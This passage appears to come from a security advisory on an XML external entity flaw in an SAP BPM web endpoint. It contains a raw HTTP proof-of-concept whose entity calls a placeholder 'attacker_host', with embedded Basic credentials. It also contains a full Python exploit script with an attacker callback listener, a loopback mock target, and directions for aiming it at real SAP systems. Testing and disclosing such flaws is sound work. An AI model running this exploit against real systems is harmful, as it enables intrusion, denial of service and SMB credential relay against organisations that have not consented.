Because the endpoint resolves the external entity declared in the request below, the SAP server can be made to connect to attacker_host. At least the following attacks are possible:

1) An attacker can perform a DoS attack (for example, an XML entity expansion attack).
2) An SMB Relay attack. This is a type of man-in-the-middle attack in which the attacker makes the victim (here, the SAP host) authenticate to a machine under the attacker's control and then relays those credentials to the real target. The attacker forwards the authentication messages in both directions and ends up with the victim's access.

PoC
```
POST /sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn HTTP/1.1
Content-Type: text/xml
User-Agent: ERPscan
Host: SAP_IP:SAP_PORT
Content-Length: 480
Connection: Keep-Alive
Cache-Control: no-cache
Authorization: Basic ZXJwc2NhbjplcnBzY2Fu

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://attacker_host"> ]><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SOAP-ENV:Body>
<m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>
&xxe;</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
```

The Authorization header carries the Basic credentials erpscan:erpscan, so the request is sent as an authenticated user; replace them, SAP_IP:SAP_PORT and attacker_host with values for the system under test. An inbound connection from the SAP host to attacker_host confirms that the parser resolves external entities.
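The following Python script is an added example and is neither ERPScan's PoC nor SAP code. It builds the request above from parameters (only the endpoint path is taken from the advisory; SAP_IP, SAP_PORT, the credentials and the listener address are all assumptions passed in by the caller), runs an attacker-side HTTP listener that flags the out-of-band callback, and, so that it can run offline, includes a constructed mock of a parser with external entities enabled that stands in for the vulnerable endpoint.

```python
import base64
import http.server
import re
import socket
import threading
import urllib.request

# Endpoint path from the advisory; hosts, ports and credentials are parameters.
BPEM_PATH = "/sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn"


def build_envelope(callback_url):
    """SOAP envelope from the PoC, with the external entity pointing at callback_url."""
    return (
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{callback_url}"> ]>'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
        ' xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"'
        ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
        ' xmlns:xsd="http://www.w3.org/2001/XMLSchema"><SOAP-ENV:Body>'
        '<m:isBPMSInUse xmlns:m="http://api.facade.bpem.sap.com/"/>'
        '&xxe;</SOAP-ENV:Body></SOAP-ENV:Envelope>'
    )


def build_request(host, port, callback_url, username, password):
    """Raw HTTP/1.1 request bytes; Content-Length is computed from the actual body."""
    body = build_envelope(callback_url).encode()
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    head = "\r\n".join([
        f"POST {BPEM_PATH} HTTP/1.1", "Content-Type: text/xml", "User-Agent: ERPscan",
        f"Host: {host}:{port}", f"Content-Length: {len(body)}", "Connection: close",
        f"Authorization: Basic {token}", "", "",
    ])
    return head.encode() + body


class CallbackListener:
    """Attacker-side HTTP listener: flags the first request the target's parser makes."""

    def __init__(self, bind="127.0.0.1", port=0):
        self.hit = threading.Event()
        hit = self.hit

        class Handler(http.server.BaseHTTPRequestHandler):
            log_message = lambda self, *args: None  # keep the demo quiet

            def do_GET(self):
                hit.set()  # the SAP host dereferenced our entity
                self.send_response(200)
                self.send_header("Content-Length", "0")
                self.end_headers()

        self.server = http.server.HTTPServer((bind, port), Handler)
        threading.Thread(target=self.server.serve_forever, daemon=True).start()
        self.url = "http://%s:%d/xxe" % self.server.server_address

    def close(self):
        self.server.shutdown()
        self.server.server_close()


def check_target(host, port, username, password, listener, timeout=5.0):
    """Send the PoC; the out-of-band callback, not the SOAP reply, is the signal."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host, port, listener.url, username, password))
        s.recv(4096)  # reply content is irrelevant for this check
    return listener.hit.wait(timeout)


class MockVulnerableBPM(http.server.BaseHTTPRequestHandler):
    """Constructed stand-in for the vulnerable endpoint (not SAP code): like a parser
    with external entities enabled, it fetches the URL named by the SYSTEM entity."""
    log_message = lambda self, *args: None

    def do_POST(self):
        body = self.rfile.read(int(self.headers["Content-Length"])).decode()
        m = re.search(r'<!ENTITY\s+\w+\s+SYSTEM\s+"([^"]+)"', body)
        if m:
            try:
                urllib.request.urlopen(m.group(1), timeout=2).close()
            except OSError:
                pass  # unreachable attacker host: still answer the SOAP call
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()


def run_local_demo():
    """Whole exchange on loopback: PoC -> mock target -> callback to the listener."""
    target = http.server.HTTPServer(("127.0.0.1", 0), MockVulnerableBPM)
    threading.Thread(target=target.serve_forever, daemon=True).start()
    listener = CallbackListener()
    try:
        return check_target(*target.server_address, "erpscan", "erpscan", listener)
    finally:
        listener.close()
        target.shutdown()
        target.server_close()


if __name__ == "__main__":
    print("external entity resolved by target:", run_local_demo())
```

Run without arguments for the loopback demonstration. Against a real system, create CallbackListener bound to an address the SAP host can reach and call check_target with SAP_IP, SAP_PORT and credentials valid for the target; a True result means the parser made the outbound connection. Note that Content-Length is computed from the body rather than hard-coded as in the PoC, which matters as soon as the attacker URL changes length.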